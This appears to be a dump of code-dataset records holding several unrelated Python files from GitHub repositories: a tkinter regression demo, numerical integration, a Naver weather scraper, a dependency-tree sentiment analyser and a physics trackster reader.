fill=tk.X)\n\n\t\t# select model combo box ........................................\n\t\tself.get_combobox(self.root,\n\t\t\t\t\t\t \ttext='Model type',\n\t\t\t\t\t\t\ttextvariable = self.selected_model,\n\t\t\t\t\t\t\tvalues = self.metamodel_names,\n\t\t\t\t\t\t\tcommand = self.select_model_type)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# parameter input box ......................................\n\t\tselected_model = self.selected_model.get()\n\t\tmetamodel_info = self.metamodel_info[selected_model]\n\n\t\tself.param_input = self.get_combobox(self.root,\n\t\t\t\t\t\t text= metamodel_info['param'],\n\t\t\t\t\t\t textvariable=self.paramstr,\n\t\t\t\t\t\t values=list(metamodel_info['param_space']),\n\t\t\t\t\t\t command=self.select_model_param)\n\t\tself.param_input.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header test data ----------------------------------------\n\t\tself.get_header(self.root,'Test data',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# N test input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"N test\",\n\t\t\t\t\t\ttextvariable=self.Nteststr,\n\t\t\t\t\t\tvalidatecommand=self.set_Ntest)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# resample test button ......................................\n\t\tself.get_button(self.root,text=\"Resample test\",command=self.press_resample_test)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header sweep ------------------------------------------\n\t\tself.get_header(self.root,text='Parameter sweep',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# sweep plot checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show parameter sweep',variable=self.show_sweep,\n\t\t\t\t\t\t command=self.click_sweep_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\tdef initialize_fig(self):\n\n\t\tax0 = self.ax[0]\n\n\t\t# pXY contour ....................................\n\t\tXg, Yg, Z, = get_contour_data(self.stddevX.get(), self.stddevY.get())\n\t\tself.plt_pXY = ax0.contour(Xg, Yg, Z)\n\t\tself.plt_pXY.set_alpha(0.0)\n\n\t\t# Data ....................................\n\t\tself.plt_train, = ax0.plot(self.Dtrain[0],self.Dtrain[1],'o',c='k',markersize=12)\n\t\tself.plt_test, = ax0.plot(self.Dtest[0],self.Dtest[1],'+',c='r',markeredgewidth=4,markersize=20)\n\n\t\t# True function ....................................\n\t\tself.xx = np.linspace(-6, 6,200)\n\t\tself.plt_truefunc, = ax0.plot(self.xx, true_funct(self.xx), c='r', linewidth=6)\n\t\tself.plt_truefunc.set_visible(self.show_function.get())\n\n\t\t# Model ....................................\n\t\tself.plt_model, = ax0.plot(self.xx, self.eval_model(self.xx), c='m', linewidth=6)\n\t\tself.plt_model.set_visible(self.show_model.get())\n\n\t\tax0.set_ylim(-2,2)\n\t\tax0.spines['right'].set_visible(False)\n\t\tax0.spines['left'].set_visible(False)\n\t\tax0.spines['bottom'].set_visible(False)\n\t\tax0.spines['top'].set_visible(False)\n\t\tax0.set_xticks([0])\n\t\tax0.set_yticks([0])\n\t\tax0.grid(linestyle='-',linewidth=2)\n\n\t\tself.txt = ax0.text(1, .1, self.format_string(),\n\t\t\thorizontalalignment='right',\n\t\t\tverticalalignment='center',\n\t\t\ttransform=ax0.transAxes,\n\t\t\tfontsize=30)\n\t\tself.txt.set_visible(self.show_model.get())\n\n\t\tax0.text(1, 0.5, 'x',\n\t\t\thorizontalalignment='right',\n\t\t\tverticalalignment='bottom',\n\t\t\ttransform=ax0.transAxes,\n\t\t\tfontsize=40)\n\n\t\tax0.text(0.48, 1,
'y',\n\t\t\thorizontalalignment='right',\n\t\t\tverticalalignment='top',\n\t\t\ttransform=ax0.transAxes,\n\t\t\tfontsize=40)\n\n\t\t# Sweep plot .........................................\n\t\tself.make_sweep_plot(self.ax[1])\n\t\tself.ax[1].set_visible(self.show_sweep.get())\n\n\tdef update_figure(self,replotpXY=False):\n\n\t\tif (self.plt_pXY is not None) and replotpXY:\n\t\t\tfor coll in self.plt_pXY.collections:\n\t\t\t\tcoll.remove()\n\t\t\tXg, Yg, Z, = get_contour_data(self.stddevX.get(), self.stddevY.get())\n\t\t\tself.plt_pXY = self.ax[0].contour(Xg, Yg, Z)\n\t\t\tif self.show_pXY.get():\n\t\t\t\tself.plt_pXY.set_alpha(1.0)\n\t\t\telse:\n\t\t\t\tself.plt_pXY.set_alpha(0.0)\n\n\t\tif self.plt_model is not None:\n\t\t\tself.plt_model.set_ydata(self.eval_model(self.xx))\n\n\t\tif self.plt_train is not None:\n\t\t\tself.plt_train.set_xdata(self.Dtrain[0])\n\t\t\tself.plt_train.set_ydata(self.Dtrain[1])\n\n\t\tif self.plt_test is not None:\n\t\t\tself.plt_test.set_xdata(self.Dtest[0])\n\t\t\tself.plt_test.set_ydata(self.Dtest[1])\n\n\t\tif self.txt is not None:\n\t\t\tself.txt.set_text(self.format_string())\n\n\t\tif self.train_plt is not None:\n\t\t\tself.train_plt.remove()\n\t\t\tself.test_plt.remove()\n\t\t\tself.make_sweep_plot(self.ax[1])\n\t\t\tself.ax[1].set_visible(self.show_sweep.get())\n\n\t\tplt.draw()\n\n\tdef set_stddevX(self):\n\t\ttry:\n\t\t\tself.stddevX.set(float(self.stddevXstr.get()))\n\t\t\tself.press_both_resample(replotpXY=True)\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn\n\n\tdef set_stddevY(self):\n\t\ttry:\n\t\t\tself.stddevY.set(float(self.stddevYstr.get()))\n\t\t\tself.press_both_resample(replotpXY=True)\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn\n\n\tdef set_Ntrain(self):\n\t\ttry:\n\t\t\tself.Ntrain.set(int(self.Ntrainstr.get()))\n\t\t\tself.press_resample_train()\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef set_Ntest(self):\n\t\ttry:\n\t\t\tself.Ntest.set(int(self.Nteststr.get()))\n\t\t\tself.press_resample_test()\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef press_resample_train(self):\n\t\tself.Dtrain = sample_data(self.Ntrain.get(),self.stddevX.get(), self.stddevY.get())\n\t\tself.build_model()\n\t\tself.update_figure()\n\n\tdef press_resample_test(self):\n\t\tself.Dtest = sample_data(self.Ntest.get(),self.stddevX.get(), self.stddevY.get())\n\t\tself.metamodel.update_test_perf(self.Dtest)\n\t\tself.update_figure()\n\n\tdef press_both_resample(self,replotpXY=False):\n\t\tself.Dtrain = sample_data(self.Ntrain.get(), self.stddevX.get(), self.stddevY.get())\n\t\tself.Dtest = sample_data(self.Ntest.get(), self.stddevX.get(), self.stddevY.get())\n\t\tself.build_model()\n\t\tself.update_figure(replotpXY)\n\n\tdef click_pXY_checkbox(self):\n\t\tif self.show_pXY.get():\n\t\t\tself.plt_pXY.set_alpha(1.0)\n\t\telse:\n\t\t\tself.plt_pXY.set_alpha(0.0)\n\t\tplt.draw()\n\n\tdef click_function_checkbox(self):\n\t\tself.plt_truefunc.set_visible(self.show_function.get())\n\t\tplt.draw()\n\n\tdef click_model_checkbox(self):\n\t\tself.plt_model.set_visible(self.show_model.get())\n\t\tself.txt.set_visible(self.show_model.get())\n\t\tplt.draw()\n\n\tdef select_model_type(self,event):\n\t\tselected_model = self.selected_model.get()\n\t\tmetamodel_info = self.metamodel_info[selected_model]\n\t\tparam_space = list(metamodel_info['param_space'])\n\n\t\t# update the param combo\n\t\tlabel = self.param_input.children['!label']\n\t\tlabel['text'] = metamodel_info['param']\n\n\t\tcombo = 
self.param_input.children['!combobox']\n\t\tcombo['values'] = param_space\n\n\t\tself.paramstr.set(param_space[0])\n\t\tself.param.set(param_space[0])\n\n\t\tself.build_model()\n\t\tself.update_figure()\n\n\tdef select_model_param(self,event):\n\t\ttry:\n\t\t\tself.param.set(int(self.paramstr.get()))\n\t\t\tself.build_model()\n\t\t\tself.update_figure()\n\t\t\treturn True\n\t\texcept ValueError:\n\t\t\treturn False\n\n\tdef click_sweep_checkbox(self):\n\t\tself.ax[1].set_visible(self.show_sweep.get())\n\t\tplt.draw()\n\n\tdef build_model(self):\n\n\t\tXtrain, Ytrain = self.Dtrain\n\n\t\tif Xtrain.shape[0]==0:\n\t\t\tself.metamodel = None\n\t\t\treturn\n\n\t\tselected_model = self.selected_model.get()\n\t\tparam_space = self.metamodel_info[selected_model]['param_space']\n\n\t\tif selected_model=='K-bins':\n\t\t\tself.metamodel = MetaKBins(param_space, self.Dtrain, self.Dtest)\n\n\t\tif selected_model=='KNN':\n\t\t\tself.metamodel = MetaKNN(param_space, self.Dtrain, self.Dtest)\n\n\t\tif selected_model == 'Linear regression':\n\t\t\tself.metamodel = MetaLinearRegression(param_space, self.Dtrain, self.Dtest)\n\n\tdef eval_model(self,X):\n\t\tif len(X)==0:\n\t\t\treturn np.nan\n\t\tif self.metamodel is None:\n\t\t\treturn np.empty(X.shape[0])\n\n\t\treturn self.metamodel.predict(self.param.get(), X)\n\n\tdef format_string(self):\n\n\t\tif self.metamodel is None:\n\t\t\treturn ''\n\n\t\tparam = self.param.get()\n\t\tind, = np.where(self.metamodel.param_space == param)\n\t\tselected_model = self.selected_model.get()\n\t\tparamname = self.metamodel_info[selected_model]['param']\n\t\ttrain_MSE, train_MAE, train_MAPE, train_R2 = self.metamodel.train_perf[ind[0],:]\n\t\ttest_MSE, test_MAE, test_MAPE, test_R2 = self.metamodel.test_perf[ind[0],:]\n\n\t\tif self.Ntest.get()==0:\n\t\t\treturn \"{} = {}\\ntrain MSE = {:.3f}\\ntrain MAE = {:.3f}\\ntrain MAPE = {:.3f}\\ntrain R2 = {:.3f}\"\\\n\t\t\t\t.format(paramname,param,train_MSE,train_MAE, train_MAPE, train_R2)\n\n\t\telse:\n\t\t\treturn \"{} = {}\\ntrain MSE = {:.3f}\\ntrain MAE = {:.3f}\\ntrain MAPE = {:.3f}\\ntrain R2 = {:.3f}\\ntest MSE = {:.3f}\\ntest MAE = {:.3f}\\ntest MAPE = {:.3f}\\ntest R2 = {:.3f}\"\\\n\t\t\t\t.format(paramname,param,train_MSE,train_MAE, train_MAPE, train_R2,test_MSE, test_MAE, test_MAPE, test_R2 )\n\n\tdef make_sweep_plot(self,ax):\n\t\tax.clear()\n\n\t\tif self.metamodel is None:\n\t\t\tparam_space = np.arange(10)\n\t\t\tloss_train = np.full(len(param_space), np.nan)\n\t\t\tloss_test = np.full(len(param_space), np.nan)\n\t\telse:\n\t\t\tparam_space = self.metamodel.param_space\n\t\t\tloss_train = self.metamodel.train_perf[:,0]\n\t\t\tloss_test = self.metamodel.test_perf[:,0]\n\n\t\tself.train_plt, = ax.plot(param_space, loss_train, 'o-', c='b',\n\t\t\t\t\t\t\t\t linewidth=3, markersize=14, label='training MSE')\n\t\tself.test_plt, = ax.plot(param_space, loss_test, 'o-', c='r',\n\t\t\t\t\t\t\t\t linewidth=3, markersize=14, label='test MSE')\n\t\tax.legend(fontsize=28, loc='upper left')\n\t\tax.spines['right'].set_visible(False)\n\t\tax.spines['left'].set_visible(False)\n\t\tax.spines['bottom'].set_visible(False)\n\t\tax.spines['top'].set_visible(False)\n\t\tax.set_xticks(param_space)\n\t\tax.tick_params(axis='x', labelsize=24)\n\t\tax.tick_params(axis='y', labelsize=24)\n\t\tselected_model = self.selected_model.get()\n\t\tparamname = self.metamodel_info[selected_model]['param']\n\t\tax.set_xlabel(paramname, fontsize=30)\n\t\tax.grid(linestyle=':', linewidth=2)\n\n####################################################\nif 
__name__ == \"__main__\":\n\tapp = TkContainer()\n\ttk.mainloop()\n","repo_name":"m0zzaR/Statistics-And-Data-Science-for-Engineers","sub_path":"demos/demo_suplearn.py","file_name":"demo_suplearn.py","file_ext":"py","file_size_in_byte":16809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39752339811","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.array([ind * 0.25 for ind in range(0, 9)])\nf = np.array([ 1.0, 0.989616, 0.958851, 0.908852,\n 0.841471, 0.759188, 0.664997, 0.562278, 0.454649 ])\n\ndef calc_integral_trapezoid(x, f, scaling_factor: int = 1, points: list = []):\n sum = 0\n for ind in range((len(x) - 1)//scaling_factor):\n cur_heap = scaling_factor*ind \n next_hep = scaling_factor*(ind +1)\n points.append((f[cur_heap] + f[next_hep])*(x[next_hep] - x[cur_heap])/2)\n sum += points[-1]\n # print(cur_heap, next_hep)\n return sum\n\n\ndef calc_integral_simpson(x, f):\n sum = 0\n h = x[1] - x[0]\n for ind in range(1, (len(x) + 1)//2):\n sum += f[2*ind - 1]\n sum *= 4\n\n for ind in range(1, (len(x) + 1)//2 - 1):\n sum += f[2*ind]*2\n sum += f[0] + f[len(f) - 1]\n return sum*h/3\n\ndef richardson_correction(I_h, I_2h, p: int = 2):\n corr_int = I_h + (I_h - I_2h)/(2**p - 1)\n return corr_int \n\n_F_ = '{:.7}'\n\nif __name__ == '__main__':\n # print(len(x))\n print(('Trapezoid method: h - '+_F_+', 2h - '+_F_+'').format(calc_integral_trapezoid(x, f), calc_integral_trapezoid(x, f, 2)))\n print('Trapezoid method with correction: '+_F_.format(richardson_correction(calc_integral_trapezoid(x, f), calc_integral_trapezoid(x, f, 2))))\n print(('Simpson\\'s method = '+_F_).format(calc_integral_simpson(x, f)))\n\n int_step = []\n calc_integral_trapezoid(x, f, 1, int_step)\n plt.figure(figsize=(16/2,9/2))\n\n plt.xlabel('x')\n plt.ylabel('f(x)')\n plt.plot(x, f, marker='o')\n plt.stem(x[:len(int_step)], int_step, 'g')\n plt.legend(['f(x)', '$\\\\frac{[f(x_{i+1}) + f(x_{i})] \\cdot h}{2}$'], fontsize=\"17\")\n plt.grid()\n plt.tight_layout()\n \n plt.gcf().set_dpi(100)\n plt.show()\n","repo_name":"UniverTime/CalcMath","sub_path":"lab5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17798644629","text":"import tkinter as tk\nclass CustomListBox(tk.Listbox):\n\n def __init__(self, master=None, on_motion=print, on_click=print, *args, **kwargs):\n tk.Listbox.__init__(self, master, *args, **kwargs)\n self.current = 0\n self.last = None\n self.motion_func = on_motion\n self.click_func = on_click\n self.bind(\"\", self.on_motion)\n self.bind(\"<>\", self.on_click)\n\n def on_motion(self, event):\n index = self.index(f\"@{event.x},{event.y}\")\n self.current = index\n if self.last != self.current :\n data = self.get(self.current)\n self.motion_func(data) \n self.last = self.current\n def on_click(self, event):\n selection = event.widget.curselection()\n if selection:\n index = selection[0]\n data = event.widget.get(index)\n self.click_func(data)\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n txt = tk.Label(root, text=\"a\")\n listbox = CustomListBox(root, on_motion=lambda x: txt.config(text=x))\n listbox.pack()\n txt.pack()\n listbox.insert(\"end\", \"one\", \"two\", \"three\", \"four\", \"five\")\n \n 
root.mainloop()","repo_name":"Redst0neFlux/dice-grapher","sub_path":"hoverselect.py","file_name":"hoverselect.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24466804816","text":"from bs4 import BeautifulSoup as bs\r\nfrom datetime import datetime, timedelta\r\nimport requests\r\n\r\n\r\ndef parse_naver_weather(elements): # 네이버날씨를 파싱하여 오전/오후의 기온을 반환하는 함수\r\n data = []\r\n for e in elements:\r\n inners = e.findAll(\"span\", {\"class\": \"weather_inner\"})\r\n rainAM = inners[0].find(\"span\", {\"class\": \"rainfall\"}).text\r\n rainPM = inners[1].find(\"span\", {\"class\": \"rainfall\"}).text\r\n tempAM = e.find(\"span\", {\"class\": \"lowest\"}).find(string=True, recursive=False)\r\n tempPM = e.find(\"span\", {\"class\": \"highest\"}).find(string=True, recursive=False)\r\n foo = \"%9s\" % tempAM + \"%9s\" % rainAM + \"%9s\" % tempPM + \"%9s\" % rainPM\r\n data.append(foo)\r\n return data\r\n\r\n\r\ndef main():\r\n # 네이버 날씨를 크롤링합니다.\r\n html = requests.get(\r\n \"https://search.naver.com/search.naver?sm=tab_hty.top&where=nexearch&query=%EC%A7%84%EC%A3%BC%EC%8B%9C+%EA%B8%88%EC%82%B0%EB%A9%B4+%EB%82%A0%EC%94%A8&oquery=%EC%A7%84%EC%A3%BC+%EB%82%A0%EC%94%A8&tqi=h9vXClprvOsssS4lLrZssssssjs-396297\"\r\n )\r\n base_url = \"https://m.search.naver.com/p/csearch/content/nqapirender.nhn?where=nexearch&pkid=227&u1=03170410&key=weather\"\r\n\r\n url = base_url\r\n # urls = base_url\r\n\r\n r = requests.get(url)\r\n html = str(r.json()[\"weekly\"])\r\n soup = bs(html, \"html5lib\")\r\n lis = soup.findAll(\"li\")\r\n result = parse_naver_weather(lis)\r\n\r\n # 사용할 날짜를 구합니다(오늘 포함 총 7일).\r\n weeks = [\"일\", \"월\", \"화\", \"수\", \"목\", \"금\", \"토\"]\r\n dt = datetime.now().date()\r\n dates7 = [\r\n (dt + timedelta(days=i)).strftime(\"%m/%d\")\r\n + \"(\"\r\n + weeks[int((dt + timedelta(days=i)).strftime(\"%w\"))]\r\n + \")\"\r\n for i in range(7)\r\n ]\r\n\r\n print(\"%20s\" % \"오전\" + \"%16s\" % \"오후\")\r\n print('%16s'%'기온'+'%7s'%'강수'+'%7s'%'기온'+'%7s'%'강수')\r\n for i in range(7):\r\n print(dates7[i] + result[i])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"7829hw/weather_for_rokaf_treaning_wing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19945138129","text":"import textblob\nfrom textblob import TextBlob\nimport numpy as np\nfrom gensim.models.fasttext import FastText\nimport nltk \nfrom nltk.stem import WordNetLemmatizer\nimport stanza \nfrom article_preprocessing import *\n\nnltk.download('wordnet')\n\n\nlemmatizer = WordNetLemmatizer()\n\nimport stanza \nfrom sentiment_config import * \nfrom model import get_word_polarity, get_sentiment, get_senti_coeff_indic, sentiment_coeff\n\nstanza.download('en')\nstanza.download('hi')\nstanza.download('ta')\nstanza.download('te')\nstanza.download('mr')\n\n\n# function to find polar words in a sentence using dependency tree\n# take the aspect term, a sentence from the article and language_code \ndef polar_dependency_tree(aspect_term, article_line, lang_code): \n # handling the different languages for which the module can work \n if lang_code == 'en':\n nlp = stanza.Pipeline('en')\n if lang_code == 'hi':\n nlp = stanza.Pipeline('hi')\n if lang_code == 'mr':\n nlp = stanza.Pipeline('mr')\n if lang_code == 'te':\n nlp = stanza.Pipeline('te')\n if lang_code == 'ta':\n nlp = 
stanza.Pipeline('ta')\n \n # using stanza pipeline to perform dependency parsing\n article_line = nlp(article_line)\n sentence = article_line.sentences[0]\n # list of dependency relations which can have polar words \n relations = ['acl', 'advcl', 'advmod', 'amod', 'xcomp', 'neg', 'parataxis', 'ccomp']\n # parts of speech tags that can have polar words \n pos_tags = ['VERB', 'ADJ']\n entity_present = False\n \n # checking if the entity is present or not.\n for word in sentence.words:\n if word.text == aspect_term:\n entity = word\n entity_present = True\n if entity_present == False:\n return []\n \n # list of polar words with respect to the entity\n polar_words = []\n # Case 1: our entity is the root term, so checkout all the child nodes \n if entity.deprel == 'root':\n for word in sentence.words:\n if (word.head == int(entity.id) and (word.deprel in relations or word.upos in pos_tags)):\n polar_words.append(word.text)\n # Case 2: our entity is not the root term, so traceback the path of the tree from entity to root.\n # also check all the other child nodes after finding the root \n else:\n for word in sentence.words:\n if word.deprel == 'root':\n root_node = word\n # checking the child nodes of the root \n for word in sentence.words:\n if (word.head == int(root_node.id) and (word.deprel in relations or word.upos in pos_tags)):\n polar_words.append(word.text)\n # tracing the path from entity to the root node \n current_word = entity\n while(current_word.deprel != 'root'):\n current_word = sentence.words[current_word.head - 1]\n if (current_word.deprel in relations or current_word.upos in pos_tags):\n polar_words.append(current_word.text)\n \n return list(set(polar_words)) \n\n\ndef get_polarity_dep_tree(aspect_term, sentences, lang_code,model=None ):\n\tpolarity = 0\n\tif lang_code == 'en':\n\t\taspect_term = spacy_tokenizer(aspect_term)\n\tif lang_code == 'hi':\n\t\taspect_term = tokenize_hin(aspect_term)\n\tfor sentence in sentences:\n\t\tif lang_code in ['en', 'hi']:\n\t\t\tpolar_words_tot = []\n\t\t\tfor term in aspect_term:\n\t\t\t\tpolar_words = polar_dependency_tree(term, sentence, lang_code)\n\t\t\t\tpolar_words_tot.extend(polar_words)\n\t\t\tpolar_words_tot = list(set(polar_words_tot))\n\t\t\tif len(polar_words_tot) > 0:\n\t\t\t\tif lang_code == 'en':\n\t\t\t\t\tsenti_vector = sentiment_coeff(polar_words_tot)\n\t\t\t\tif lang_code == 'hi':\n\t\t\t\t\tsenti_vector = get_senti_coeff_indic(polar_words_tot, lang_code, model)\n\t\t\t\tsentiment = sum(senti_vector)\n\t\t\t\tpolarity = polarity + sentiment\n\t\t\telse:\n\t\t\t\tpolarity = polarity + 0\n\t\telse:\n\t\t\tpolar_words = polar_dependency_tree(aspect_term, sentence, lang_code)\n\t\t\tif len(polar_words) > 0:\n\n\t\t\t\tsenti_vector = get_senti_coeff_indic(polar_words,lang_code, model)\n\t\t\t\tsentiment = sum(senti_vector)\n\t\t\t\tpolarity = polarity + sentiment\n\t\t\telse:\n\t\t\t\tpolarity = polarity + 0 \n\t\t\n\tif polarity > 0:\n\t\treturn 1\n\telif polarity == 0:\n\t\treturn 0\n\telse:\n\t\treturn -1 ","repo_name":"AchintyaX/ABSA_Indic","sub_path":"ABSA_Dependency_Tree.py","file_name":"ABSA_Dependency_Tree.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40023314335","text":"# You have two types of tiles: a 2 x 1 domino shape and a tromino shape. You may rotate these shapes.\n\n\n# Given an integer n, return the number of ways to tile an 2 x n board. 
Since the answer may be very large, return it modulo 109 + 7.\n\n# In a tiling, every square must be covered by a tile. Two tilings are different if and only if there are two 4-directionally adjacent cells on the board such that exactly one of the tilings has both squares occupied by a tile.\n\n \n\n# Example 1:\n\n\n# Input: n = 3\n# Output: 5\n# Explanation: The five different ways are show above.\n# Example 2:\n\n# Input: n = 1\n# Output: 1\n\n\nclass Solution:\n def numTilings(self, n: int) -> int:\n mod = 1000000007\n dp = [[0,0,0,0] for i in range(n+1)]\n \n def makeState(t1, t2):\n if not t1 and not t2:\n return 0\n elif not t1 and t2:\n return 1\n elif t1 and not t2:\n return 2\n else:\n return 3\n \n def solve(i, t1, t2):\n \n if i == n:\n return 1\n state = makeState(t1, t2)\n if dp[i][state] != 0:\n return dp[i][state]\n count = 0\n t3 = t4 = True if i+1 ak.Array:\n \"\"\" Computes the total energy of a supercluster from an array of supercluster ids \n Preserves the inner index (usually CP id)\n Parameters :\n - supercls_ts_idxs : type nevts * var * var * uint64\n Returns : type nevts * var * float (energy sum)\n \"\"\"\n # FIrst flatten the inner dimension (CP id) before taking tracksters\n energies_flat = tracksters.raw_energy[ak.flatten(supercls_ts_idxs, axis=-1)]\n # Rebuild the inner index\n energies = ak.unflatten(energies_flat, ak.flatten(ak.num(supercls_ts_idxs, axis=-1)), axis=-1)\n\n return ak.sum(energies, axis=-1)\n\n\n\n \nclass DumperReader:\n class MultiFileReader:\n def __init__(self, files:list[uproot.ReadOnlyDirectory]):\n self.files = files\n \n def __getitem__(self, key):\n excpts = []\n for file in self.files:\n try:\n return file[key]\n except uproot.KeyInFileError as e:\n excpts.append(e)\n raise KeyError(*excpts)\n \n def __init__(self, file:str|uproot.ReadOnlyDirectory|list[uproot.ReadOnlyDirectory], directoryName:str=\"ticlDumper\") -> None:\n try:\n self.fileDir = file[directoryName]\n except TypeError:\n try:\n self.fileDir = self.MultiFileReader([f[directoryName] for f in file])\n except TypeError:\n self.fileDir = uproot.open(file + \":\" + directoryName)\n \n @property\n def nEvents(self):\n return self.fileDir[\"tracksters\"].num_entries\n\n @cached_property\n def tracksters(self) -> ak.Array:\n return self.fileDir[\"tracksters\"].arrays()\n \n @cached_property\n def tracksters_zipped(self) -> ak.Array:\n return ak.zip({\"ts_id\" : ak.local_index(self.tracksters.raw_energy, axis=1)} | \n {key : self.tracksters[key] for key in self.tracksters.fields \n if key not in [\"event\", \"NClusters\", \"NTracksters\"]},\n depth_limit=2, # don't try to zip vertices\n with_name=\"tracksters\"\n )\n\n @cached_property\n def simTrackstersCP(self) -> ak.Array:\n return self.fileDir[\"simtrackstersCP\"].arrays(filter_name=[\"raw_energy\", \"raw_energy_em\", \"regressed_energy\", \"barycenter_*\"])\n @cached_property\n def simTrackstersCP_df(self) -> pd.DataFrame:\n return ak.to_dataframe(self.simTrackstersCP, levelname=lambda x : {0:\"eventInternal\", 1:\"caloparticle_id\"}[x])\n \n @cached_property\n def superclusters(self) -> ak.Array:\n \"\"\" Gets the supercluster trackster ids\n type: nevts * var (superclsCount) * var (trackstersInSupercls) * uint64 (trackster id)\n \"\"\"\n return self.fileDir[\"superclustering/superclusteredTracksters\"].array()\n \n @cached_property\n def superclusters_all(self) -> ak.Array:\n \"\"\" Same as superclusters but tracksters not in a supercluster are included in a one-trackster supercluster each\n \"\"\"\n return 
self.fileDir[\"superclustering/superclusteredTrackstersAll\"].array()\n\n @cached_property\n def superclusteringDnnScore(self) -> ak.Array:\n return self.fileDir[\"superclustering/superclusteringDNNScore\"].array()\n\n @cached_property\n def associations(self) -> ak.Array:\n return self.fileDir[\"associations\"].arrays(filter_name=\"tsCLUE3D_*\")\n \n \n @cached_property\n def supercluster_df(self) -> pd.DataFrame:\n return ak.to_dataframe(self.superclusters, anonymous=\"ts_id\",\n levelname=lambda x : {0:\"eventInternal\", 1:\"supercls_id\", 2:\"ts_in_supercls_id\"}[x])\n\n @cached_property\n def supercluster_all_df(self) -> pd.DataFrame:\n \"\"\" Same as superclusters_df but tracksters not in a supercluster are included in a one-trackster supercluster each\n \"\"\"\n return ak.to_dataframe(self.superclusters_all, anonymous=\"ts_id\",\n levelname=lambda x : {0:\"eventInternal\", 1:\"supercls_id\", 2:\"ts_in_supercls_id\"}[x])\n \n @cached_property\n def supercluster_merged_properties_all(self) -> pd.DataFrame:\n \"\"\" Dataframe holding supercluster properties (one row per supercluster) \n \n Tracksters not in a supercluster are included as one-trackster superclusters\n \"\"\"\n return (supercluster_joinTracksters(self.supercluster_all_df, self.tracksters_zipped[[\"raw_energy\", \"regressed_energy\"]])\n .groupby(level=[\"eventInternal\", \"supercls_id\"])\n .agg(\n raw_energy_supercls=pd.NamedAgg(\"raw_energy\", \"sum\"),\n regressed_energy_supercls=pd.NamedAgg(\"regressed_energy\", \"sum\"),\n ))\n \n @cached_property\n def assocs_bestScore_simToReco_df(self) -> pd.DataFrame:\n \"\"\" Make a Df of largest score associations of each SimTrackster \n \n Index eventInternal\tts_id, column : caloparticle_id\n \"\"\"\n # Get largest association score\n assocs_simToReco_largestScore = assocs_bestScore(assocs_zip_simToReco(self.associations))\n # Make a df out of it : index eventInternal\tts_id, column : caloparticle_id\n return (ak.to_dataframe(assocs_simToReco_largestScore[[\"ts_id\", \"caloparticle_id\", \"score\", \"sharedE\"]], \n levelname=lambda x : {0:\"eventInternal\", 1:\"caloparticle_id_wrong\"}[x])\n .reset_index(\"caloparticle_id_wrong\", drop=True)\n .set_index(\"caloparticle_id\", append=True)\n )\n \n def assocs_bestScore_recoToSim_df(self, dropOnes=True) -> pd.DataFrame:\n \"\"\" Make a Df of largest score associations of each Trackster \n \n Parameters : \n - dropOnes : if True, do not include associations of score 1 (worst score)\n Index eventInternal\tcaloparticle_id, column : ts_id, score, sharedE\n \"\"\"\n # Get largest association score\n assocs = assocs_bestScore((assocs_dropOnes if dropOnes else lambda x:x)(assocs_zip_recoToSim(self.associations)))\n # Make a df out of it : index eventInternal\tts_id, column : caloparticle_id\n return (ak.to_dataframe(assocs[[\"ts_id\", \"caloparticle_id\", \"score\", \"sharedE\"]], \n levelname=lambda x : {0:\"eventInternal\", 1:\"ts_id_wrong\"}[x])\n .reset_index(\"ts_id_wrong\", drop=True)\n .set_index(\"ts_id\", append=True)\n )\n \n \n\n\n\n","repo_name":"tcuisset/HgcalSuperclustering","sub_path":"analyzer/dumperReader/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33212419882","text":"import os\nfrom sty import fg, rs \nimport pyfiglet\nfrom mutagen.mp4 import MP4\n\n# Static\ndir_path = os.path.dirname(os.path.realpath(__file__)) \nfile_extensions = ('mp4')\n\ndef main():\n ##Clear the 
